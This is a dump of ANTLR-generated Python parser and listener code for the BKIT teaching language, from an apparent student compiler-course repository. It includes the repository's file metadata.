visitor.visitExpr8(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_expr8)\n try:\n self.state = 314\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.operand()\n pass\n 
elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 310\n self.match(BKITParser.LEFT_PAREN)\n self.state = 311\n self.expr()\n self.state = 312\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_operand)\n try:\n self.state = 319\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.match(BKITParser.ID)\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 317\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 318\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n 
self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_call\" ):\n return visitor.visitFunction_call(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.ID)\n self.state = 322\n self.match(BKITParser.LEFT_PAREN)\n self.state = 333\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 323\n self.expr()\n self.state = 328\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 324\n self.match(BKITParser.COMMA)\n self.state = 325\n 
self.expr()\n self.state = 330\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 335\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 336\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIndex_op\" ):\n return visitor.visitIndex_op(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_index_op)\n try:\n self.state = 347\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 338\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 339\n self.expr()\n self.state = 340\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 342\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 343\n self.expr()\n self.state = 344\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 345\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, 
re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray\" ):\n return visitor.visitArray(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 349\n self.match(BKITParser.ID)\n self.state = 350\n self.match(BKITParser.ASSIGN)\n self.state = 351\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_data\" ):\n return visitor.visitPrimitive_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def 
primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_lit\" ):\n return visitor.visitArray_lit(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 
60, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 355\n self.match(BKITParser.LEFT_BRACE)\n self.state = 370\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 358\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 356\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 357\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 367\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 360\n self.match(BKITParser.COMMA)\n self.state = 363\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 361\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 362\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 369\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 372\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return 
self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_list\" ):\n return visitor.visitVar_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.state = 374\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 375\n self.var_init()\n pass\n\n\n self.state = 385\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 378\n self.match(BKITParser.COMMA)\n self.state = 381\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.state = 379\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 380\n self.var_init()\n pass\n\n\n self.state = 387\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return 
self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_init\" ):\n return visitor.visitVar_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,36,self._ctx)\n if la_ == 1:\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 392 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 389\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 390\n self.match(BKITParser.INT_LIT)\n self.state = 391\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 394 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 396\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 399\n self.match(BKITParser.ASSIGN)\n self.state = 402\n self._errHandler.sync(self)\n token = self._input.LA(1)\n 
if token in [BKITParser.LEFT_BRACE]:\n self.state = 400\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 401\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_non_init\" ):\n return visitor.visitVar_non_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_var_non_init)\n self._la = 0 # Token type\n try:\n self.state = 413\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 404\n self.match(BKITParser.ID)\n self.state = 408 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 405\n 
self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n self.match(BKITParser.INT_LIT)\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 410 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 412\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_var\" ):\n return visitor.visitComposite_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 415\n self.match(BKITParser.ID)\n self.state = 420 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 416\n 
self.match(BKITParser.LEFT_BRACKET)\n self.state = 417\n self.expr()\n self.state = 418\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 422 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_init\" ):\n return visitor.visitComposite_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 424\n self.composite_var()\n self.state = 425\n self.match(BKITParser.ASSIGN)\n self.state = 426\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return 
self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_init\" ):\n return visitor.visitPrimitive_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.ID)\n self.state = 429\n self.match(BKITParser.ASSIGN)\n self.state = 430\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitParams_list\" ):\n return visitor.visitParams_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 432\n self.var_non_init()\n 
self.state = 437\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 433\n self.match(BKITParser.COMMA)\n self.state = 434\n self.var_non_init()\n self.state = 439\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[16] = self.expr1_sempred\n self._predicates[17] = self.expr2_sempred\n self._predicates[18] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.6972261667251587, "alphanum_fraction": 0.7021156549453735, "avg_line_length": 29.045198440551758, "blob_id": "29cb49d8097cdd2d47ba83ba5541196eccfbf14b", "content_id": "26045b29f1be557b9c810ac824b28f3c8bfceb15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10635, "license_type": "no_license", "max_line_length": 81, "num_lines": 354, "path": "/Assignments/assignment1/src/forJava/BKITListener.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import 
BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete listener for a parse tree produced by BKITParser.\nclass BKITListener(ParseTreeListener):\n\n # Enter a parse tree produced by BKITParser#program.\n def enterProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n # Exit a parse tree produced by BKITParser#program.\n def exitProgram(self, ctx:BKITParser.ProgramContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_declare.\n def enterVar_declare(self, ctx:BKITParser.Var_declareContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_declare.\n def exitVar_declare(self, ctx:BKITParser.Var_declareContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#function_declare.\n def enterFunction_declare(self, ctx:BKITParser.Function_declareContext):\n pass\n\n # Exit a parse tree produced by BKITParser#function_declare.\n def exitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#stmt_list.\n def enterStmt_list(self, ctx:BKITParser.Stmt_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#stmt_list.\n def exitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#stmt.\n def enterStmt(self, ctx:BKITParser.StmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#stmt.\n def exitStmt(self, ctx:BKITParser.StmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#if_stmt.\n def enterIf_stmt(self, ctx:BKITParser.If_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#if_stmt.\n def exitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_declare_stmt.\n def enterVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_declare_stmt.\n def exitVar_declare_stmt(self, ctx:BKITParser.Var_declare_stmtContext):\n 
pass\n\n\n # Enter a parse tree produced by BKITParser#for_stmt.\n def enterFor_stmt(self, ctx:BKITParser.For_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#for_stmt.\n def exitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#while_stmt.\n def enterWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#while_stmt.\n def exitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#dowhile_stmt.\n def enterDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#dowhile_stmt.\n def exitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#assign_stmt.\n def enterAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#assign_stmt.\n def exitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#break_stmt.\n def enterBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#break_stmt.\n def exitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#continue_stmt.\n def enterContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#continue_stmt.\n def exitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#call_stmt.\n def enterCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n pass\n\n # Exit a parse tree produced by BKITParser#call_stmt.\n def exitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#return_stmt.\n def enterReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n pass\n\n 